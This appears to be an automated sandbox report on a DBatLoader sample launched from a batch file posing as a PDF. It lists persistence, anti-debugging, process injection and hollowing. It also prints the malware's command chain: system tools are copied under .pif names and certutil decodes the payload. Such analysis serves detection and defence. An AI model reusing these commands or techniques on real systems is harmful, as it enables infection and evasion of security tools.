Source:	Binary string: rundll32.pdb source: rdha.pif, 00000019.00000000.1808198041.00007FF7AB718000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif, 0000003B.00000000.2125759689.00007FF629D28000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif.17.dr
Source:	Binary string: rundll32.pdbGCTL source: rdha.pif, 00000019.00000000.1808198041.00007FF7AB718000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif, 0000003B.00000000.2125759689.00007FF629D28000.00000002.00000001.01000000.0000000B.sdmp, rdha.pif.17.dr
Source:	Binary string: certutil.pdb source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr
Source:	Binary string: cmd.pdb source: alpha.pif, 00000013.00000000.1781982162.00007FF71DCD2000.00000002.00000001.01000000.00000008.sdmp, esentutl.exe, 00000021.00000003.1829871051.00000000055D0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000022.00000000.1833954751.0000000000401000.00000020.00000001.01000000.00000008.sdmp, alpha.pif.16.dr
Source:	Binary string: easinvoker.pdbGCTL source: ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020857000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1823196141.00000000009EB000.00000004.00000020.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020840000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.0000000020810000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E850000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1820802992.000000007EA0F000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1823196141.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: certutil.pdbGCTL source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr
Source:	Binary string: extrac32.pdbGCTL source: extrac32.exe, 0000000F.00000002.1778788715.0000023AA9960000.00000004.00000020.00020000.00000000.sdmp, expha.pif, 00000010.00000000.1779015849.00007FF66B896000.00000002.00000001.01000000.00000007.sdmp, expha.pif.15.dr

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 26.2.ANYDESK.PIF.256fc48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.ANYDESK.PIF.256fc48.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.ANYDESK.PIF.2b00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1844718324.000000000256F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: expha.pif.15.dr

Static PE information: 0xF4B59DD8 [Fri Feb 5 20:38:48 2100 UTC]

Source: C:\Users\Public\ANYDESK.PIF

Code function: 26_2_02B13E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,

26_2_02B13E20

Source: alpha.pif.16.dr	Static PE information: section name: .didat
Source: rdha.pif.17.dr	Static PE information: section name: .didat
Source: ghf.pif.18.dr	Static PE information: section name: .didat

Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B262A4 push 02B2630Fh; ret	26_2_02B26307
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B03210 push eax; ret	26_2_02B0324C
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B260AC push 02B26125h; ret	26_2_02B2611D
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B1A018 push ecx; mov dword ptr [esp], edx	26_2_02B1A01D
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B1606B push 02B160A4h; ret	26_2_02B1609C
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B1606C push 02B160A4h; ret	26_2_02B1609C
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B261F8 push 02B26288h; ret	26_2_02B26280
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B0617A push 02B061BEh; ret	26_2_02B061B6
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B0617C push 02B061BEh; ret	26_2_02B061B6
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B26144 push 02B261ECh; ret	26_2_02B261E4
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B0F600 push 02B0F64Dh; ret	26_2_02B0F645
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B0C493 push 02B0C61Eh; ret	26_2_02B0C616
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B0C498 push 02B0C61Eh; ret	26_2_02B0C616
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B0F4F4 push 02B0F56Ah; ret	26_2_02B0F562
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B12410 push ecx; mov dword ptr [esp], edx	26_2_02B12412
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B0F5FF push 02B0F64Dh; ret	26_2_02B0F645
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B25854 push 02B25A3Ah; ret	26_2_02B25A32
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B12EDA push 02B12F87h; ret	26_2_02B12F7F
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B12EDC push 02B12F87h; ret	26_2_02B12F7F
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B0BE18 push ecx; mov dword ptr [esp], edx	26_2_02B0BE1D
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B19FB4 push ecx; mov dword ptr [esp], edx	26_2_02B19FB9
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B13F84 push 02B13FBCh; ret	26_2_02B13FB4
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B05DA0 push 02B05DFBh; ret	26_2_02B05DF3
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B05D9E push 02B05DFBh; ret	26_2_02B05DF3
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B0CDE0 push 02B0CE0Ch; ret	26_2_02B0CE04
Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B13D40 push 02B13D82h; ret	26_2_02B13D7A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_05362806 push ecx; ret	35_2_05362819
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00446B75 push ecx; ret	47_2_00446B85
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_00452BB4 push eax; ret	47_2_00452BC1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044DDB0 push eax; ret	47_2_0044DDC4
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0044DDB0 push eax; ret	47_2_0044DDEC

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\rdha.pif	Jump to dropped file
Source: C:\Users\Public\ANYDESK.PIF	File created: C:\Users\user\Links\Kaitdipg.PIF	Jump to dropped file
Source: C:\Users\Public\ghf.pif	File created: C:\Users\Public\ANYDESK.PIF	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\expha.pif	Jump to dropped file
Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\ghf.pif	Jump to dropped file

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_004062E2 ShellExecuteW,URLDownloadToFileW,

62_2_004062E2

Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\rdha.pif	Jump to dropped file
Source: C:\Users\Public\ANYDESK.PIF	File created: C:\Users\user\Links\Kaitdipg.PIF	Jump to dropped file
Source: C:\Users\Public\ghf.pif	File created: C:\Users\Public\ANYDESK.PIF	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\expha.pif	Jump to dropped file
Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\ghf.pif	Jump to dropped file

Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\rdha.pif	Jump to dropped file
Source: C:\Users\Public\ghf.pif	File created: C:\Users\Public\ANYDESK.PIF	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\expha.pif	Jump to dropped file
Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\ghf.pif	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\rdha.pif	Jump to dropped file
Source: C:\Users\Public\ghf.pif	File created: C:\Users\Public\ANYDESK.PIF	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\expha.pif	Jump to dropped file
Source: C:\Users\Public\expha.pif	File created: C:\Users\Public\ghf.pif	Jump to dropped file

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

62_2_0041AC43

Source: C:\Users\Public\ANYDESK.PIF	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kaitdipg			Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kaitdipg			Jump to behavior

Source: C:\Users\Public\ANYDESK.PIF

Code function: 26_2_02B164E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

26_2_02B164E4

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\rdha.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\ANYDESK.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Users\Public\alpha.pif	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Users\Public\alpha.pif	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1

Source: C:\Windows\SysWOW64\recover.exe

Code function: 47_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

47_2_0040BAE3

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		62_2_0041A941
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		62_2_0684B7CF

Source: C:\Windows\SysWOW64\SndVol.exe

API coverage: 3.5 %

Source: C:\Windows\SysWOW64\colorcpl.exe TID: 2532

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\Public\ANYDESK.PIF	Code function: 26_2_02B052F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	26_2_02B052F8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_053610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	35_2_053610F1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_05366580 FindFirstFileExA,	35_2_05366580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 47_2_0040B477 FindFirstFileW,FindNextFileW,	47_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 49_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	49_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 53_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	53_2_00407898
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	62_2_004090DC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	62_2_0040B6B5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	62_2_0041C7E5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	62_2_0040B8BA
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0044E989 FindFirstFileExA,	62_2_0044E989
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	62_2_00408CDE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	62_2_00419CEE
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	62_2_00407EDD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00406F13 FindFirstFileW,FindNextFileW,	62_2_00406F13
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0684D673 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	62_2_0684D673
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0683C543 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	62_2_0683C543
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06839F6A __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	62_2_06839F6A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06837DA1 FindFirstFileW,FindNextFileW,	62_2_06837DA1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06838D6B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	62_2_06838D6B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0684AB7C FindFirstFileW,	62_2_0684AB7C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0687F817 FindFirstFileExA,	62_2_0687F817

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

62_2_00407357

Source: C:\Windows\SysWOW64\recover.exe

Code function: 47_2_0041A8D8 memset,GetSystemInfo,

47_2_0041A8D8

Source: colorcpl.exe, 00000023.00000003.2138790179.000000000318C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2078794382.00000000031E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bhv3B03.tmp.47.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: colorcpl.exe, 00000023.00000003.2078794382.00000000031E2000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2136599199.00000000031E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW?
Source: ANYDESK.PIF, 0000001A.00000002.1843896741.000000000097E000.00000004.00000020.00020000.00000000.sdmp, ANYDESK.PIF, 0000003C.00000002.2143083880.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\Public\ANYDESK.PIF	API call chain: ExitProcess graph end node	graph_26-22816
Source: C:\Windows\SysWOW64\recover.exe	API call chain: ExitProcess graph end node	graph_49-34180
Source: C:\Users\Public\ANYDESK.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\Public\ANYDESK.PIF

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\Public\ANYDESK.PIF

Code function: 26_2_02B1A5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

26_2_02B1A5B0

Source: C:\Users\Public\ANYDESK.PIF	Process queried: DebugPort			Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Process queried: DebugPort

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 35_2_053660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

35_2_053660E2

Source: C:\Windows\SysWOW64\recover.exe

47_2_0040BAE3

Source: C:\Users\Public\ANYDESK.PIF

Code function: 26_2_02B13E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,

26_2_02B13E20

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_05364AB4 mov eax, dword ptr fs:[00000030h]	35_2_05364AB4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_004438F4 mov eax, dword ptr fs:[00000030h]	62_2_004438F4
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06831143 mov eax, dword ptr fs:[00000030h]	62_2_06831143
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06831143 mov eax, dword ptr fs:[00000030h]	62_2_06831143
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06874782 mov eax, dword ptr fs:[00000030h]	62_2_06874782

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 35_2_0536724E GetProcessHeap,

35_2_0536724E

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_053660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_053660E2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_05362B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	35_2_05362B1C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 35_2_05362639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_05362639
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	62_2_00435398
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	62_2_0043B88D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	62_2_00434D6E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_00434F01 SetUnhandledExceptionFilter,	62_2_00434F01
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_0686C71B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	62_2_0686C71B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06866226 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	62_2_06866226
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 62_2_06865BFC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	62_2_06865BFC

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\Public\ANYDESK.PIF	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 7120000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 6830000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Users\Public\ANYDESK.PIF	Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 71215F6			Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Thread created: C:\Windows\SysWOW64\SndVol.exe EIP: 68315F6

Drops or copies certutil.exe with a different name (likely to bypass HIPS)

Source: C:\Users\Public\expha.pif

File created: C:\Users\Public\ghf.pif

Jump to dropped file

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Users\Public\expha.pif

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Users\Public\ANYDESK.PIF	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 7120000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Memory written: C:\Windows\SysWOW64\SndVol.exe base: 6830000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\colorcpl.exe	Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section unmapped: C:\Windows\SysWOW64\recover.exe base address: 400000	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\Public\ANYDESK.PIF	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 7120000	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 78F008	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 2AE0008	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Memory written: C:\Windows\SysWOW64\recover.exe base: 2A34008	Jump to behavior
Source: C:\Users\Public\ANYDESK.PIF	Memory written: C:\Windows\SysWOW64\SndVol.exe base: 6830000

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 62_2_004197D9 mouse_event,

62_2_004197D9

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y "C:\\Windows\\System32\\extrac32.exe" "C:\\Users\\Public\\expha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\\Windows\\System32\\rundll32.exe" "C:\\Users\\Public\\rdha.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\expha.pif C:\\Users\\Public\\expha.pif /C /Y "C:\Windows\System32\certutil.exe" "C:\\Users\\Public\\ghf.pif"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\user\Desktop\WATER TREATMENT PROJECT\WATER TREATMENT PROJECT\RFQ Filter Specifications,PDF.cmd" "C:\Users\Public\HEW.3GP" 9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /C C:\\Users\\Public\\ghf.pif -decodehex -f "C:\Users\Public\HEW.3GP" "C:\Users\Public\ANYDESK.PIF" 12	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c PING -n 2 127.0.0.1	Jump to behavior
